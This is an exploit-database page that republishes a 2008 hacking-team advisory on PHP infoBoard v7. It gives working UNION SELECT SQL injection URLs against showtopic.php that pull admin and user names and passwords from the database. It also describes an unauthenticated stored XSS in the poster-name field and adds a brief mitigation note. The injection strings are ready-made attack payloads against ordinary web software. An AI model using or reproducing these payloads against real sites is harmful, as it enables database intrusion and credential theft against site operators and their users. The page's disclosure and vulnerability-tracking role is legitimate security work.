header-logo
Suggest Exploit
vendor:
PHP infoBoard
by:
CWH Underground
8.8
CVSS
HIGH
Remote SQL Injection and Stored XSS
89, 79
CWE
Product Name: PHP infoBoard
Affected Version From: v.7
Affected Version To: v.7
Patch Exists: NO
Related CWE: N/A
CPE: a:cannot.info:phpinfoboard:7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities

PHP infoBoard V.7 Plus is vulnerable to Remote SQL Injection and Stored XSS. An attacker can inject malicious SQL code into the 'idcat' parameter of the 'showtopic.php' page to gain access to the database. Additionally, an attacker can inject malicious JavaScript code into the 'isname' parameter of the 'newtopic' page to perform a stored XSS attack.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, ensure that user input is properly sanitized and validated before being used in web page content.
Source

Exploit-DB raw data:

==========================================================
  PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities
==========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 25 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : PHP infoBoard V.7 Plus
VERSION     : v.7
VENDOR      : http://cannot.info/phpinfoboard
DOWNLOAD    : http://cannot.info/lib/dw/plus7.zip
#####################################################

-- Remote SQL Injection ---

[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10

Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard.


-- Strore XSS --

At page http://[Target]/[path]/?action=newtopic&idcat=[number]

This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name.
We can inject javascript into this feild as result in "Stored XSS". 

Example code of vulnerable input feild:
ª×èÍ</td><td width='125' height='25' align='left'><input  name='isname' type='text'  size='25' value='' />

Note: 
- [number] is a idcat  that an administrator assigns it (default is 1).
- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard.


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-25]

Navigation

Suggest Exploit

Services By CQR